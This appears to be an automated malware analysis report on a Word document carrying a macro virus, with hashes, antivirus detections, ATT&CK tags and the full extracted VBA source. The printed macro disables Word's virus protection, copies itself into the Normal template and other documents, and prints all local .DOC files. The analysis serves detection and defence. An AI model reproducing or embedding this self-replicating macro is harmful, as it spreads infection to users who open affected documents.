Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bbc8fdf8d62f5582…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 55.5 KB
Created: 1999-06-07 19:41:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 1329516a07f54f98109621e90690156b
SHA-1: b5b2f9e581368bea3eb21e3201b81847a1bef530
SHA-256: bbc8fdf8d62f5582ed56ac0407a252b2b63acb2ce77585b9952cb3b17eacabdc
Risk Score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains a VBA macro with a Document_Open subroutine, a common technique for executing code as soon as the document is opened. The macro explicitly sets the 'VirusProtection' option off and then prints every file with a .DOC extension in the local directory. This behavior suggests a destructive or disruptive intent; the comments in the document body frame it as a contest entry.

Heuristics (4)

  • ClamAV: Doc.Trojan.Small-498 [critical] (CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Small-498
  • VBA macros detected [medium, 1 related finding] (OLE_VBA_MACROS)
    Document contains VBA macro code
  • Document_Open macro [high] (OLE_VBA_DOCOPEN)
    Document_Open macro
  • Embedded URL [info] (EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://pegasus.cc.ucf.edu/~kes65601 (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 1685 bytes
SHA-256: ba527b1ff5114cd5522ec05d35936c7cb7de5e2912ac794c1422b19f6e37e260
Detection: ClamAV: Doc.Trojan.Small-498
Obfuscation or payload: unlikely

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()

' Disable Macro Protection
Options.VirusProtection = (1 + 2 - 3):

' Copy Active to Normal
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Find("Document_Open", 1, 10, NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.CountOfLines, 30, True, False, False) = False Then
    ActiveDocument.VBProject.VBComponents.Item(1).Export ("SkamWerks")
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("SkamWerks")
    NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, 4
    Options.SaveNormalPrompt = (-2 + 2)
' Copy From Normal to Active
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Find("Document_Open", 1, 10, ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines, 30, True, False, False) = False Then
    ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.AddFromFile ("SkamWerks")
    ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.DeleteLines 1, 4
    ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    'Payload - Print Out All Docs in Local Directory.
    myDoc = Dir("*.DOC"): While myDoc <> "": Application.PrintOut FileName:=myDoc: myDoc = Dir(): Wend
  
End If
End Sub

' SmallWorld Virii - By Skammy of SkamWerks! http://pegasus.cc.ucf.edu/~kes65601
' Written for the sole purpose of the Smallest Word Class Macro Virii Contest!
' Please do not distrubute!